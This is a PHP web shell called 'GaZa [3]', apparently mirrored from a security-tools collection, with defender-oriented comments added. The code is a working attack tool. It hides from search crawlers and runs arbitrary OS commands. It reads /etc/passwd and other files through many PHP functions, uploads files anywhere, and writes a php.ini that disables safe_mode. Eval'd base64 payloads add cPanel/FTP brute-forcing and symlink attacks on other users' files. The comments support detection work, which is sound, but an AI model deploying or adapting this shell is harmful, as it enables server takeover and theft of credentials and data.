mirror of
https://github.com/BlackArch/webshells
synced 2024-11-26 05:40:23 +00:00
<?
|
||
|
// Crawler cloaking: when the User-Agent contains one of the listed search-engine
// bot names (case-insensitive match), the script answers "404 Not Found" and exits,
// so crawlers never see or index the page.
// Defender note: a PHP file that returns 404 to crawler User-Agents but 200 to
// ordinary browsers is a useful hunting signal when reviewing access logs.
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
|
||
|
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
|
||
|
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
|
||
|
header('HTTP/1.0 404 Not Found');
|
||
|
exit;
|
||
|
}
|
||
|
}
|
||
|
// Turns off all PHP error reporting, so failures of the operations below leave no
// visible trace in the response.
error_reporting(0);
|
||
|
// Request parameters that drive the rest of the script. All three come straight from
// POST with no validation. The parameter names (function_tkl, pwd, dir) are distinctive
// strings for content signatures and request-body inspection.
// $function_tkl selects a branch below ('mysql', 'mysql1'); presumably it is also what
// gets passed to readFileTKL() - that call is not visible in this part of the file.
$function_tkl = $_POST['function_tkl'];
|
||
|
$pwd = $_POST['pwd'];
|
||
|
$dir = $_POST['dir'];
|
||
|
// No directory supplied: fall back to the script's current working directory.
if ($dir == ''){
|
||
|
$dir = getcwd();
|
||
|
}
|
||
|
// Writes a php.ini into the current directory whose content tries to switch off
// safe_mode, disable_functions and open_basedir. The handle is never closed.
// $gaza is not assigned anywhere in the visible code, so this branch presumably
// depends on register_globals or on code outside this view - TODO confirm.
// Defender note: an unexpected php.ini (or similar per-directory ini file) appearing
// under the web root is an indicator of compromise; file-integrity monitoring on the
// document root catches it.
if ($gaza == 'ini'){
|
||
|
$fp = fopen("php.ini","w+");
|
||
|
fwrite($fp,"safe_mode = Off
|
||
|
disable_functions = NONE
|
||
|
open_basedir = OFF ");
|
||
|
}
|
||
|
// Unrestricted upload: the uploaded file is moved into the client-supplied $dir under
// the client-supplied file name, with no check on extension, type or path components.
// The multipart field name 'gazaUP' is specific to this sample and usable in signatures.
// Defender note: new files written by the web server account outside designated upload
// directories, and uploads that land in script-executable locations, are the signals
// to alert on; upload directories should not be configured to execute scripts.
if (!empty ($_FILES['gazaUP']))
|
||
|
{
|
||
|
move_uploaded_file($_FILES['gazaUP']['tmp_name'],$dir.'/'.$_FILES['gazaUP']['name']);
|
||
|
// The client-controlled name, size and type are concatenated into HTML without escaping.
$gaza_text = "<b>Uploaded Successfully</b><br>file name : ".$_FILES['gazaUP']['name']."<br>file size : ".$_FILES['gazaUP']['size']."<br>file type : ".$_FILES['gazaUP']['type']."<br>";
|
||
|
}
|
||
|
// Prepares (but does not print here) an HTML form asking for MySQL connection details
// and a file path. Its hidden field re-submits function_tkl=mysql1, which is the value
// the database-based file read in this script checks for.
if ($function_tkl == 'mysql'){
|
||
|
$gaza_text1 = "<form method='POST' align='center'>
|
||
|
<br>
|
||
|
:::Please enter your Database information:::
|
||
|
<br>Host Name:<input type='text' name='host_name' value='localhost' ><br>
|
||
|
User Name :<input type='text' name='user_name' ><br>
|
||
|
User Pass :<input type='text' name='user_pass' ><br>
|
||
|
Database Name :<input type='text' name='db_name' ><br>
|
||
|
File to Read :<input type='text' name='gaza_mysql_file' value='/etc/passwd'><br>
|
||
|
<input type='hidden' name='function_tkl' value='mysql1' ><br>
|
||
|
<input type='submit' value='Read' ><br>
|
||
|
</form>
|
||
|
";
|
||
|
}
|
||
|
// File read through the database client. The branch connects to MySQL with
// caller-supplied credentials, creates a temporary single-column LONGBLOB table, loads
// the requested file into it with LOAD DATA LOCAL INFILE (the field and line terminators
// are strings that are not expected to occur, so the whole file lands in one row), and
// selects the row back into $gaza_file.
// NOTE(review): with the old libmysqlclient-based driver the LOCAL read was done by the
// client library rather than by PHP's file functions, which is presumably why this sits
// next to the other read primitives - confirm against the PHP/driver version in use.
// Defender notes:
//  - Disabling local_infile on the MySQL server and mysql.allow_local_infile in PHP
//    closes this path.
//  - Every POST value is interpolated into the SQL text without escaping.
//  - The mysql_* functions were removed in PHP 7.0, so this branch only runs on older
//    interpreters.
if ($function_tkl == 'mysql1'){
|
||
|
|
||
|
$host_name = $_POST['host_name']; // e.g : localhost
|
||
|
$user_name = $_POST['user_name']; // e.g : gaza_hacker
|
||
|
$user_pass = $_POST['user_pass']; // e.g : 123456
|
||
|
$db_name = $_POST['db_name']; // e.g : tkl_3654654
|
||
|
$gaza_mysql_file = $_POST['gaza_mysql_file']; // e.g : /etc/passwd
|
||
|
$mysql_use = "yes";
|
||
|
// The statements are run in order; the temporary table name is 'A' plus the current time.
$inquiry = array (
|
||
|
"USE $db_name",
|
||
|
'CREATE TEMPORARY TABLE ' . ($tkl_table = 'A'.time ()) . ' (a LONGBLOB)',
|
||
|
"LOAD DATA LOCAL INFILE '$gaza_mysql_file' INTO TABLE $tkl_table FIELDS "
|
||
|
. "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
|
||
|
. "ESCAPED BY '' "
|
||
|
. "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
|
||
|
|
||
|
"SELECT a FROM $tkl_table LIMIT 1"
|
||
|
);
|
||
|
mysql_connect ($host_name, $user_name, $user_pass);
|
||
|
|
||
|
foreach ($inquiry as $inquiry_info) {
|
||
|
$quiry = mysql_query ($inquiry_info);
|
||
|
// Any failing statement aborts the page and prints the statement plus the server error.
if ($quiry == false) die (
|
||
|
"error: " . $inquiry_info . "\n" .
|
||
|
"error info: " . mysql_error () . "\n"
|
||
|
);
|
||
|
// Statements that return no row (USE, CREATE, LOAD) are skipped here.
if (! $tkl_read = @mysql_fetch_array ($quiry, MYSQL_NUM)) continue;
|
||
|
$gaza_file = htmlspecialchars($tkl_read[0]);
|
||
|
mysql_free_result ($quiry);
|
||
|
}
|
||
|
}
|
||
|
/**
 * Sends the content of the file at $pwd to the response, using the PHP primitive named
 * by $function_tkl. Every case is a different API for the same file read, so blocking a
 * single function through disable_functions leaves the remaining cases available.
 *
 * Defender notes:
 *  - The htmlspecialchars() wrappers around show_source(), readfile(), fpassthru(),
 *    highlight_file() and var_dump() escape nothing: those functions have already
 *    written their output, and the wrapper only receives their return value, which is
 *    then discarded.
 *  - The "include" case executes $pwd as PHP instead of merely reading it.
 *  - open_basedir applies to the stream-based cases; confining the PHP worker account
 *    with file-system permissions limits all of them.
 *
 * @param string $function_tkl Name of the read primitive (the switch key below).
 * @param string $pwd          Path to read; presumably the unvalidated POST value read at
 *                             the top of the script - the call site is not visible here.
 */
function readFileTKL ($function_tkl,$pwd) {
|
||
|
|
||
|
switch($function_tkl){
|
||
|
case "show_source":
|
||
|
htmlspecialchars(show_source($pwd));
|
||
|
break;
|
||
|
case "readfile":
|
||
|
htmlspecialchars(readfile($pwd));
|
||
|
break;
|
||
|
// Executes the target as PHP code; content outside PHP tags is emitted as-is.
case "include":
|
||
|
htmlspecialchars(include $pwd);
|
||
|
break;
|
||
|
case "fpassthru":
|
||
|
$fp = fopen($pwd, 'r');
|
||
|
htmlspecialchars(fpassthru($fp));
|
||
|
break;
|
||
|
// The only case whose output is actually HTML-escaped before being echoed.
case "file":
|
||
|
$output = file($pwd);
|
||
|
foreach( $output as $line )
|
||
|
{
|
||
|
echo htmlspecialchars($line . "\n");
|
||
|
}
|
||
|
break;
|
||
|
case "highlight_file":
|
||
|
htmlspecialchars(highlight_file($pwd));
|
||
|
break;
|
||
|
// Builds a file:// URL from $pwd, a NUL byte and a traversal back to this script's own
// path, then calls curl_exec() twice on it.
// NOTE(review): presumably aimed at a long-fixed path check in old PHP curl bindings -
// confirm against the interpreter version before relying on this reading.
case "curl":
|
||
|
$tkl_cu =
|
||
|
curl_init("file:///".$pwd."\x00/../../../../../../../../../../../../".__FILE__);
|
||
|
curl_exec($tkl_cu);
|
||
|
htmlspecialchars(var_dump(curl_exec($tkl_cu)));
|
||
|
break;
|
||
|
// Ignores $pwd: walks UIDs 0-1999 and prints every field of each account entry found,
// colon-separated. each() was removed in PHP 8.0.
case "posix_getpwuid":
|
||
|
for($uid=0;$uid<2000;$uid++){
|
||
|
$gaza_ar = posix_getpwuid($uid);
|
||
|
if (!empty($gaza_ar)) {
|
||
|
while (list ($key, $val) = each($gaza_ar)){
|
||
|
print "$val:";
|
||
|
}
|
||
|
print "\n";
|
||
|
}
|
||
|
}
|
||
|
break;
|
||
|
// Copies the target through the compress.zlib:// stream wrapper into a temporary file,
// echoes that file and removes it. $ooopo is not defined in this function, so tempnam()
// receives an empty directory argument.
case "copy":
|
||
|
$tmp=tempnam($ooopo, "cx");
|
||
|
if(copy("compress.zlib://".$pwd, $tmp)){
|
||
|
$ioio = fopen($tmp, "r");
|
||
|
echo fread($ioio, filesize($tmp));
|
||
|
fclose($ioio);
|
||
|
unlink($tmp);
|
||
|
};
|
||
|
break;
|
||
|
// Line-by-line read. $gaza_file is not defined in this function's scope, so only
// $buffer contributes to the output.
case "fgets":
|
||
|
$handle = @fopen($pwd, "r");
|
||
|
if ($handle) {
|
||
|
while (($buffer = fgets($handle, 4096)) !== false) {
|
||
|
echo $gaza_file.$buffer;
|
||
|
}
|
||
|
fclose($handle);
|
||
|
}
|
||
|
break;
|
||
|
case "file_get_contents":
|
||
|
echo file_get_contents($pwd);
|
||
|
|
||
|
break;
|
||
|
case "fread":
|
||
|
$handle = fopen($pwd, "r");
|
||
|
echo fread($handle, filesize($pwd));
|
||
|
fclose($handle);
|
||
|
break;
|
||
|
// Reads to end of stream starting at byte offset 10, so the first ten bytes are skipped.
case "stream_get_contents":
|
||
|
if ($stream = fopen($pwd, 'r')) {
|
||
|
echo stream_get_contents($stream, -1, 10);
|
||
|
fclose($stream);
|
||
|
}
|
||
|
break;
|
||
|
}
|
||
|
}
|
||
|
/**
 * Runs the string in $_POST['command'] as an operating-system command and echoes the
 * captured output. The function tries exec(), passthru(), system() and shell_exec() in
 * that order, using the first one function_exists() reports, and otherwise falls back
 * to popen(), which is attempted without an existence check.
 *
 * Defender notes:
 *  - A disable_functions hardening list has to cover all five functions; covering only
 *    some of them leaves this routine working through the next branch.
 *  - The runtime signal is the web server or PHP worker process spawning a shell or
 *    other child process; process-creation telemetry and an audit rule on that account
 *    detect it regardless of which PHP function was used.
 *  - The POST parameter name 'command' next to the other parameter names of this sample
 *    is usable for request-body inspection.
 */
function exTKL() {
|
||
|
$in=$_POST['command'];
|
||
|
// Parsed as (!$in) == '': true whenever $in is a truthy string.
if (!$in == '') {
|
||
|
$out = '';
|
||
|
if (function_exists('exec')) {
|
||
|
@exec($in,$out);
|
||
|
$out = @join("\n",$out);
|
||
|
} elseif (function_exists('passthru')) {
|
||
|
ob_start();
|
||
|
@passthru($in);
|
||
|
$out = ob_get_clean();
|
||
|
} elseif (function_exists('system')) {
|
||
|
ob_start();
|
||
|
@system($in);
|
||
|
$out = ob_get_clean();
|
||
|
} elseif (function_exists('shell_exec')) {
|
||
|
$out = shell_exec($in);
|
||
|
} elseif (is_resource($f = @popen($in,"r"))) {
|
||
|
$out = "";
|
||
|
while(!@feof($f))
|
||
|
$out .= fread($f,1024);
|
||
|
pclose($f);
|
||
|
}
|
||
|
// Command output is written to the page without HTML escaping.
echo $out;
|
||
|
}
|
||
|
}
|
||
|
function hidTKL () {
|
||
|
echo "
|
||
|
<html>
|
||
|
<head>
|
||
|
<title>GaZa [3] ~!!</title>
|
||
|
<meta http-equiv='Content-Type' content='text/html; charset=windows-1256' />
|
||
|
<style>
|
||
|
body { background-color:#000000; color:#25ff00; font-family:Verdana; font-size:11px; }
|
||
|
h1,h3 { color:white; font-family:Verdana; font-size:11px; }
|
||
|
input,textarea,select,button { color: rgb(0, 190, 0); background-color:#444; border:1px solid #4F4F4F; font-family:Verdana; font-size:11px; }
|
||
|
textarea { font-family:Courier; }
|
||
|
a { color:rgb(0, 190, 0); text-decoration:none; font-family:Verdana; font-size:11px; }
|
||
|
a:hover { color:rgb(0, 250, 0); }
|
||
|
td { font-size:12px; vertical-align:middle; }
|
||
|
th { font-size:13px; vertical-align:middle; }
|
||
|
table { empty-cells:show; }
|
||
|
.inf { color:#7F7F7F; }
|
||
|
</style>
|
||
|
<!--
|
||
|
###################################################################
|
||
|
# :'######::::::'###::::'########::::'###:::: #
|
||
|
# '##... ##::::'## ##:::..... ##::::'## ##::: #
|
||
|
# ##:::..::::'##:. ##:::::: ##::::'##:. ##:: #
|
||
|
# ##::'####:'##:::. ##:::: ##::::'##:::. ##: #
|
||
|
# ##::: ##:: #########::: ##::::: #########: #
|
||
|
# ##::: ##:: ##.... ##:: ##:::::: ##.... ##: #
|
||
|
# . ######::: ##:::: ##: ########: ##:::: ##: #
|
||
|
# :......::::..:::::..::........::..:::::..:: #
|
||
|
# '##::::'##::::'###:::::'######::'##:::'##:'########:'########::#
|
||
|
# ##:::: ##:::'## ##:::'##... ##: ##::'##:: ##.....:: ##.... ##:#
|
||
|
# ##:::: ##::'##:. ##:: ##:::..:: ##:'##::: ##::::::: ##:::: ##:#
|
||
|
# #########:'##:::. ##: ##::::::: #####:::: ######::: ########::#
|
||
|
# ##.... ##: #########: ##::::::: ##. ##::: ##...:::: ##.. ##:::#
|
||
|
# ##:::: ##: ##.... ##: ##::: ##: ##:. ##:: ##::::::: ##::. ##::#
|
||
|
# ##:::: ##: ##:::: ##:. ######:: ##::. ##: ########: ##:::. ##:#
|
||
|
# ..:::::..::..:::::..:::......:::..::::..::........::..:::::..::#
|
||
|
# '########:'########::::'###::::'##::::'##: #
|
||
|
# ... ##..:: ##.....::::'## ##::: ###::'###: #
|
||
|
# ::: ##:::: ##::::::::'##:. ##:: ####'####: #
|
||
|
# ::: ##:::: ######:::'##:::. ##: ## ### ##: #
|
||
|
# ::: ##:::: ##...:::: #########: ##. #: ##: #
|
||
|
# ::: ##:::: ##::::::: ##.... ##: ##:.:: ##: #
|
||
|
# ::: ##:::: ########: ##:::: ##: ##:::: ##: #
|
||
|
# :::..:::::........::..:::::..::..:::::..:: #
|
||
|
# WwW.Gaza-Hacker.NeT #
|
||
|
# GaZa [3] #
|
||
|
# Coded By TKL #
|
||
|
###################################################################
|
||
|
-->
|
||
|
|
||
|
</head>
|
||
|
<body>
|
||
|
<hr>
|
||
|
<form method='GET'>
|
||
|
<input type='submit' value='Home' size='10' >
|
||
|
<input type='submit' name='tool' value='Files' size='10' >
|
||
|
<input type='submit' name='tool' value='Bruteforce' size='10' >
|
||
|
<input type='submit' name='tool' value='bypass' size='10' >
|
||
|
<input type='submit' name='tool' value='SQL' size='10' >
|
||
|
<input type='submit' name='tool' value='symlink' size='10' >
|
||
|
<input type='submit' name='tool' value='Change-Admin' size='10' >
|
||
|
<input type='submit' name='tool' value='vBulletin-Tool' size='10' >
|
||
|
<input type='submit' name='tool' value='Server-Info' size='10' >
|
||
|
<input type='submit' name='tool' value='About' size='10' >
|
||
|
</form>
|
||
|
<hr>";
|
||
|
}
|
||
|
function fotTKL($gaza_text,$gaza_text1,$dir) {
|
||
|
echo "</textarea>
|
||
|
</td>
|
||
|
</tr>
|
||
|
<tr>
|
||
|
<td>
|
||
|
<left>
|
||
|
<form method='POST'>
|
||
|
<input type='text' name='dir' value= '".$dir."' size='30' >
|
||
|
<input type='submit' value='>>' size='10' >
|
||
|
</form>
|
||
|
</left>
|
||
|
</td>
|
||
|
<form method='POST'> <p>
|
||
|
<input type='text' name='command' />
|
||
|
<input type='submit' value='Execute' />
|
||
|
|
||
|
</p>
|
||
|
</form>
|
||
|
|
||
|
<td align='right' >
|
||
|
<form method='POST'> <p>
|
||
|
<input type='text' name='pwd' value='/etc/passwd' />
|
||
|
<select name='function_tkl'>
|
||
|
<option value='curl'>curl</option>
|
||
|
<option value='show_source'>show source</option>
|
||
|
<option value='stream_get_contents'>stream get contents</option>
|
||
|
<option value='readfile'>readfile</option>
|
||
|
<option value='include'>include</option>
|
||
|
<option value='fpassthru'>fpassthru</option>
|
||
|
<option value='fread'>fread</option>
|
||
|
<option value='file_get_contents'>file get contents</option>
|
||
|
<option value='file'>file</option>
|
||
|
<option value='fgets'>fgets</option>
|
||
|
<option value='copy'>copy</option>
|
||
|
<option value='highlight_file'>highlight file</option>
|
||
|
<option value='posix_getpwuid'>posix_getpwuid</option>
|
||
|
<option value='mysql'>MYsql</option>
|
||
|
</select>
|
||
|
<input type='submit' value='Read' />
|
||
|
</p>
|
||
|
</form>
|
||
|
</td>
|
||
|
</tr>
|
||
|
</table>
|
||
|
<hr>
|
||
|
<left>
|
||
|
<form method='POST' enctype='multipart/form-data'>
|
||
|
<input type='file' name='gazaUP' size='23' >
|
||
|
<input type='text' name='dir' value='".$dir."' >
|
||
|
<input type='submit' value='Upload' size='35' >
|
||
|
</form>
|
||
|
</left>
|
||
|
<table width='100%'>
|
||
|
<tr>
|
||
|
<td width='50%'>
|
||
|
".$gaza_text."
|
||
|
</td>
|
||
|
<td width='50%' >
|
||
|
".$gaza_text1."
|
||
|
</td>
|
||
|
</tr>
|
||
|
</table>
|
||
|
</body>
|
||
|
</html>";
|
||
|
}
|
||
|
function toolTKL () {
|
||
|
$tkl_tool = $_GET['tool'];
|
||
|
switch($tkl_tool){
|
||
|
case "About":
|
||
|
$tkl = "ZWNobyAiR2FaYSBTaGVsbCBWIDMgPGJyIC8+PGEgaHJlZj0naHR0cDovL2dhemEtaGFja2VyLm5ldCcgdGFyZ2V0PSdfYmxhbmsnPkdhemEgSGFDS2VSIFRlYW08L2E+PGJyIC8+IERldmVsb3BlZCBieSA8YSBocmVmPSdodHRwOi8vd3d3LmZhY2Vib29rLmNvbS9kci50a2wnIHRhcmdldD0nX2JsYW5rJz5US0w8L2E+IjsK";
|
||
|
eval(base64_decode($tkl));
|
||
|
exit;
|
||
|
case "SQL":
|
||
|
$tkl = "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
|
||
|
eval(base64_decode($tkl));
|
||
|
exit;
|
||
|
case "Change-Admin":
|
||
|
$tkl = "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
|
||
|
eval(base64_decode($tkl));
|
||
|
exit;
|
||
|
case "Bruteforce":
|
||
|
$tkl = "CiRjcGFuZWxfcG9ydD0iMjA4MiI7CiRjb25uZWN0X3RpbWVvdXQ9NTsKQGVycm9yX3JlcG9ydGluZygwKTsKc2V0X3RpbWVfbGltaXQoMCk7CiRzdWJtaXQ9JF9SRVFVRVNUWydzdWJtaXQnXTsKJHVzZXJzPSRfUkVRVUVTVFsndXNlcnMnXTsKJHBhc3M9JF9SRVFVRVNUWydwYXNzd29yZHMnXTsKJHRhcmdldD0kX1JFUVVFU1RbJ3RhcmdldCddOwokY3JhY2t0eXBlPSRfUkVRVUVTVFsnY3JhY2t0eXBlJ107CiR0YXJnZXQgPSAibG9jYWxob3N0IjsKCmVjaG8nCjxmb3JtICBtZXRob2Q9IlBPU1QiPgpVc2VycyBsaXN0ICZuYnNwOyAmbmJzcDsgJm5ic3A7ICAmbmJzcDsgJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7ICZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyAmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsgJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7ICZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyAmbmJzcDsmbmJzcDsmbmJzcDtQYXNzd29yZCBsaXN0PGJyPgo8dGV4dGFyZWEgcm93cz0iMjAiIG5hbWU9InVzZXJzIiBjb2xzPSIyNSI+Jy4kdXNlcnMuJzwvdGV4dGFyZWE+PHRleHRhcmVhIHJvd3M9IjIwIiBuYW1lPSJwYXNzd29yZHMiIGNvbHM9IjI1Ij4nLiRwYXNzLic8L3RleHRhcmVhPjxicj4KClNlbGVjdCBCcnV0ZWZvcmNlIFR5cGUgOiA8YnIvPjxwPgo8c2VsZWN0IG5hbWU9ImNyYWNrdHlwZSI+CjxvcHRpb24gdmFsdWU9ImNwYW5lbCI+Q1BhbmVsIENyYWNrPC9vcHRpb24+CjxvcHRpb24gdmFsdWU9ImZ0cCI+RlRQIENyYWNrPC9vcHRpb24+Cjwvc2VsZWN0Pgo8YnI+PCEtLVQuSy5MLS0+PGJyPjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJDcmFjayIgbmFtZT0ic3VibWl0Ii8+CjwvcD48L2Zvcm0+JzsKCQkKaWYgKCRfUE9TVFsnY3JhY2t0eXBlJ109PSdmdHAnKXsKZnVuY3Rpb24gYnJ1dGUoKQp7CglnbG9iYWwgJHZhbHMsJG1pbl9sZW5ndGgsJG1heF9sZW5ndGg7CglnbG9iYWwgJHRhcmdldCwkcHVyZXVzZXIsJGNvbm5lY3RfdGltZW91dDsKCSRtaW49JG1pbl9sZW5ndGg7CgkkbWF4PSRtYXhfbGVuZ3RoOwoJJEEgPSBhcnJheSgpOwoJJG51bVZhbHMgPSBjb3VudCgkdmFscyk7CgkkaW5jRG9uZSA9ICIiOwoJJHJlYWxNYXggPSAiIjsKCSRjdXJyZW50VmFsID0gIiI7CgkkZmlyc3RWYWwgPSAiIjsKCWZvciAoJGkgPSAwOyAkaSA8ICgkbWF4ICsgMSk7ICRpKyspIHsKCQkkQVskaV0gPSAtMTsKCX0KCQoJZm9yICgkaSA9IDA7ICRpIDwgJG1heDsgJGkrKykgewoJCSRyZWFsTWF4ID0gJHJlYWxNYXggLiAkdmFsc1skbnVtVmFscyAtIDFdOwoJfQoJZm9yICgkaSA9IDA7ICRpIDwgJG1pbjsgJGkrKykgewoJCSRBWyRpXSA9ICR2YWxzWzBdOwoJfQoJJGkgPSAwOwoJd2hpbGUgKCRBWyRpXSAhPSAtMSkgewoJCSRmaXJzdFZhbCAuPSAkQVskaV07CgkJJGkrKzsKCX0KCWNwYW5lbF9jaGVjaygkdGFyZ2V0LCRwdXJldXNlciwkZmlyc3RWYWwsJGNvbm5l
Y3RfdGltZW91dCk7CgkKCXdoaWxlICgxKSB7CgkJZm9yICgkaSA9IDA7ICRpIDwgKCRtYXggKyAxKTsgJGkrKykgewoJCQlpZiAoJEFbJGldID09IC0xKSB7CgkJCQlicmVhazsKCQkJfQoJCX0KCQkkaS0tOwoJCSRpbmNEb25lID0gMDsKCQl3aGlsZSAoISRpbmNEb25lKSB7CQoJCQlmb3IgKCRqID0gMDsgJGogPCAkbnVtVmFsczsgJGorKykgewoJCQkJaWYgKCRBWyRpXSA9PSAkdmFsc1skal0pIHsKCQkJCQlicmVhazsKCQkJCX0KCQkJfQoJCQlpZiAoJGogPT0gKCRudW1WYWxzIC0gMSkpIHsKCQkJCSRBWyRpXSA9ICR2YWxzWzBdOwoJCQkJJGktLTsKCQkJCWlmICgkaSA8IDApIHsKCQkJCQlmb3IgKCRpID0gMDsgJGkgPCAoJG1heCArIDEpOyAkaSsrKSB7CgkJCQkJCWlmICgkQVskaV0gPT0gLTEpIHsKCQkJCQkJCWJyZWFrOwoJCQkJCQl9CgkJCQkJfQoJCQkJCSRBWyRpXSA9ICR2YWxzWzBdOwoJCQkJCSRBWyRpICsgMV0gPSAtMTsKCQkJCQkkaW5jRG9uZSA9IDE7CgkJCQkJcHJpbnQgIlN0YXJ0aW5nICIgLiAoc3RybGVuKCRjdXJyZW50VmFsKSArIDEpIC4gIiBDaGFyYWN0ZXJzIENyYWNraW5nPGJyPiI7CgkJCQl9CgkJCX0gZWxzZSB7CgkJCQkkQVskaV0gPSAkdmFsc1skaiArIDFdOwoJCQkJJGluY0RvbmUgPSAxOwoJCQl9CgkJfQoJCSRpID0gMDsKCQkkY3VycmVudFZhbCA9ICIiOwoJCXdoaWxlICgkQVskaV0gIT0gLTEpIHsKCQkJJGN1cnJlbnRWYWwgPSAkY3VycmVudFZhbCAuICRBWyRpXTsKCQkJJGkrKzsKCQl9CgkJY3BhbmVsX2NoZWNrKCR0YXJnZXQsJHB1cmV1c2VyLCRjdXJyZW50VmFsLCRjb25uZWN0X3RpbWVvdXQpOwoJCWlmICgkY3VycmVudFZhbCA9PSAkcmVhbE1heCkgewoJCQlyZXR1cm4gMDsKCQl9Cgl9Cn0KZnVuY3Rpb24gZ2V0bWljcm90aW1lKCkgewogICBsaXN0KCR1c2VjLCAkc2VjKSA9IGV4cGxvZGUoIiAiLG1pY3JvdGltZSgpKTsKICAgcmV0dXJuICgoZmxvYXQpJHVzZWMgKyAoZmxvYXQpJHNlYyk7Cn0gCgpmdW5jdGlvbiBmdHBfY2hlY2soJGhvc3QsJHVzZXIsJHBhc3MsJHRpbWVvdXQpCnsKICRjaCA9IGN1cmxfaW5pdCgpOwogY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VSTCwgImZ0cDovLyRob3N0Iik7CiBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOwogY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hUVFBBVVRILCBDVVJMQVVUSF9CQVNJQyk7CiBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfRlRQTElTVE9OTFksIDEpOwogY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VTRVJQV0QsICIkdXNlcjokcGFzcyIpOwogY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwgJHRpbWVvdXQpOwogY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0ZBSUxPTkVSUk9SLCAxKTsKICRkYXRhID0gY3VybF9leGVjKCRjaCk7CiBpZiAoIGN1cmxfZXJybm8oJGNoKSA9PSAyOCApCiB7CiBwcmludCAiWy1dRXJyb3IgOiBDb25uZWN0aW9uIFRpbWVvdXQiO2V4
aXQ7CiB9CiBlbHNlIGlmICggY3VybF9lcnJubygkY2gpID09IDAgKQogewogIHByaW50ICI8YnI+WytdQnJ1dGVmb3JjZSB
|
||
|
eval(base64_decode($tkl));
|
||
|
exit;
|
||
|
case "Server-Info":
|
||
|
$tkl = "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
|
||
|
eval(base64_decode($tkl));
|
||
|
exit;
|
||
|
case "bypass":
|
||
|
$tkl = "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
|
||
|
eval(base64_decode($tkl));
|
||
|
exit;
|
||
|
case "symlink":
|
||
|
$tkl = "ICBAc2V0X3RpbWVfbGltaXQoMCk7IEBta2RpcigndGtsJywwNzc3KTsgJElJSUlJSUlJSUlsMSAgPSAiT3B0aW9ucyBhbGwgXG4gRGlyZWN0b3J5SW5kZXggZ2F6YS5odG1sIFxuIEFkZFR5cGUgdGV4dC9wbGFpbiAucGhwIFxuIEFkZEhhbmRsZXIgc2VydmVyLXBhcnNlZCAucGhwIFxuICBBZGRUeXBlIHRleHQvcGxhaW4gLmh0bWwgXG4gQWRkSGFuZGxlciB0eHQgLmh0bWwgXG4gUmVxdWlyZSBOb25lIFxuIFNhdGlzZnkgQW55IjsgJElJSUlJSUlJSUkxSSA9QGZvcGVuICgndGtsLy5odGFjY2VzcycsJ3cnKTsgZndyaXRlKCRJSUlJSUlJSUlJMUkgLCRJSUlJSUlJSUlJbDEpOyAgZWNobyAnICA8YnIgLz48YnIgLz4gPGZvcm0gbWV0aG9kPSJwb3N0Ij4gRmlsZSBQYXRoOjxiciAvPiA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iZmlsZSIgdmFsdWU9Ii9ob21lL2dhemFoYWNrL3B1YmxpY19odG1sL2NvbmZpZy5waHAiIHNpemU9IjYwIi8+IDxicj5TeW1saW5rIE5hbWU8YnI+IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJzeW1maWxlIiB2YWx1ZT0iZ2F6YS50eHQiIHNpemU9IjYwIi8+PGJyIC8+PGJyIC8+IDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJzeW1saW5rIiBuYW1lPSJzeW1saW5rIiAvPiA8YnIgLz48YnIgLz4gPC9mb3JtPiAnOyAkSUlJSUlJSUkxbElsID0gJF9QT1NUWydmaWxlJ107ICRzeW1maWxlID0gJF9QT1NUWydzeW1maWxlJ107ICRzeW1saW5rID0gJF9QT1NUWydzeW1saW5rJ107IGlmICgkc3ltbGluaykgeyBAc3ltbGluaygiJElJSUlJSUlJMWxJbCIsInRrbC8kc3ltZmlsZSIpOyBlY2hvICc8YnIgLz48YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0idGtsLycuJHN5bWZpbGUuJyIgPj09PT4nLiRzeW1maWxlLic8PT09PC9hPic7IH0gIEBzeW1saW5rKCcvJywndGtsL3Jvb3QnKTsgICRJSUlJSUlJSUlsbEkgPSBAZmlsZSgnL2V0Yy9uYW1lZC5jb25mJyk7IGlmKCEkSUlJSUlJSUlJbGxJKSB7IGRpZSAoIiBjYW4ndCByZWFkIC9ldGMvbmFtZWQuY29uZiIpOyB9IGVsc2UgeyAgICAgZWNobyAiPGRpdiBjbGFzcz0ndG1wJz48dGFibGUgIHdpZHRoPSc0MCUnPjx0ZD5Eb21haW5zPC90ZD48dGQ+VXNlcnMgJiBzeW1saW5rPC90ZD4iOyBmb3JlYWNoKCRJSUlJSUlJSUlsbEkgYXMgJElJSUlJSUlJSWxsMSl7IGlmKGVyZWdpKCd6b25lJywkSUlJSUlJSUlJbGwxKSl7IHByZWdfbWF0Y2hfYWxsKCcjem9uZSAiKC4qKSIjJywkSUlJSUlJSUlJbGwxLCRJSUlJSUlJSUlsMTEpOyBmbHVzaCgpOyBpZihzdHJsZW4odHJpbSgkSUlJSUlJSUlJbDExWzFdWzBdKSkgPjIpeyAkSUlJSUlJSUlJMUkxID0gcG9zaXhfZ2V0cHd1aWQoQGZpbGVvd25lcignL2V0Yy92YWxpYXNlcy8nLiRJSUlJSUlJSUlsMTFbMV1bMF0pKTsgJElJSUlJSUlJMUkxbCA9ICRJSUlJSUlJSUkxSTFbJ25hbWUnXSA